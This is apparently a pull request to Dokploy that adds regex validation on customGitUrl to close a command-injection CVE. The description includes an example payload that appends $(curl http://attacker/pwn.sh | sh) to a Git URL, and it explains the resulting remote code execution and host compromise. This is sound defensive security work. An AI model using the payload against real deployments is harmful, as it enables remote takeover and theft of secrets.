### PR TITLE
fix(security): validate customGitUrl to prevent command injection via command substitution

### DIFF
--- a/packages/server/src/db/schema/application.ts
+++ b/packages/server/src/db/schema/application.ts
@@ -1,4 +1,5 @@
 import { VALID_BRANCH_REGEX } from "@dokploy/server/utils/git-branch-validation";
+import { VALID_GIT_URL_REGEX } from "@dokploy/server/utils/git-url-validation";
 import { relations } from "drizzle-orm";
 import {
 	bigint,
@@ -512,7 +513,13 @@ export const apiSaveGitProvider = createSchema
 		enableSubmodules: true,
 	})
 	.required()
-	.extend({ customGitBranch: branchField })
+	.extend({
+		customGitBranch: branchField,
+		customGitUrl: z
+			.string()
+			.min(1)
+			.refine(VALID_GIT_URL_REGEX, "Invalid Git URL"),
+	})
 	.merge(
 		createSchema.pick({
 			customGitSSHKeyId: true,

--- a/packages/server/src/utils/git-url-validation.ts
+++ b/packages/server/src/utils/git-url-validation.ts
@@ -1,0 +1,20 @@
+// Valid git URL patterns for HTTPS and SSH clone URLs.
+// Rejects shell metacharacters that would enable command injection.
+//
+// HTTPS examples accepted:
+//   https://github.com/owner/repo.git
+//   http://gitlab.example.com/group/subgroup/repo.git
+//
+// SSH examples accepted:
+//   git@github.com:owner/repo.git
+//   ssh://git@gitlab.com:22/owner/repo.git
+//   git@gitea.example.com:owner/repo.git
+//
+// Rejected: $(...), `...`, ;, |, &, <, >, newlines, spaces outside of SSH scheme
+const HTTPS_GIT_URL_REGEX = /^https?:\/\/[^\s;|&$`(){}[\]<>'"\\]+$/;
+const SSH_GIT_URL_REGEX =
+	/^(?:ssh:\/\/)?[a-zA-Z_][a-zA-Z0-9_-]*@[a-zA-Z0-9.-]+(?::\d{1,5})?:[^\s;|&$`(){}[\]<>'"\\]+$/;
+
+export const VALID_GIT_URL_REGEX = (url: string): boolean => {
+	return HTTPS_GIT_URL_REGEX.test(url) || SSH_GIT_URL_REGEX.test(url);
+};


### PR DESCRIPTION
## Summary

This PR fixes the command injection vector in `customGitUrl` described in [CVE-2026-45628 / GHSA-3frc-cfh9-ch2c](https://github.com/Dokploy/dokploy/security/advisories/GHSA-3frc-cfh9-ch2c), which was reported but remains unpatched (`Patched versions: None`).

- `git-url-validation.ts`: Added `VALID_GIT_URL_REGEX` that accepts standard HTTPS and SSH Git URLs while rejecting shell metacharacters (`$`, backticks, `;`, `|`, `&`, etc.). Follows the same pattern as the existing `VALID_BRANCH_REGEX`.
- `application.ts`: `apiSaveGitProvider` now validates `customGitUrl` with `.refine(VALID_GIT_URL_REGEX)` at the Zod schema layer, rejecting malicious URLs before they reach the shell command builder.

## Problem

The `customGitUrl` field was validated only with `z.string().optional()` — no shell-metacharacter restriction. The value is interpolated **unquoted** into a shell command in `cloneGitRepository()` (`packages/server/src/utils/providers/git.ts:81`):

    git clone --branch ${customGitBranch} --depth 1 --progress ${customGitUrl} ${outputPath}

This command is executed via `execAsync` (local, `/bin/sh -c`) or `execAsyncRemote` (remote SSH), both of which pass the string verbatim to a shell — **no escaping is applied**.

An authenticated user with `application: create/update` permission can inject arbitrary shell commands via `$(...)` command substitution in the Git URL. Example — setting `customGitUrl` to:

```sh
https://github.com/legit/repo.git$(curl http://attacker/pwn.sh | sh)
```
makes the shell expand $(curl http://attacker/pwn.sh | sh) before git clone runs, executing the injected command on the build host. This bypasses set -e because it is expanded inline within the argument string — it does not introduce control-flow characters that would break the if ! ... then ... fi structure.

## Impact
- Remote Code Execution as the Dokploy process user (typically root in self-hosted deployments, or a user with docker group access)
- Full host compromise via Docker socket access → container escape → root on host
- Cross-project data theft: access to environment variables, secrets, SSH keys, and application data of all projects on the same instance
- Lateral movement: in remote server deployments, the RCE executes on the remote SSH target via execAsyncRemote
- Stealth: the $(...) expansion produces empty output, so git clone succeeds and the deployment appears successful

## Why customGitBranch is safe but customGitUrl was not

customGitBranch is already validated by VALID_BRANCH_REGEX = /^[a-zA-Z0-9._\-/]+$/ which blocks all shell metacharacters. customGitUrl had no equivalent validation — only z.string().optional(). This PR adds the equivalent protection for the URL field.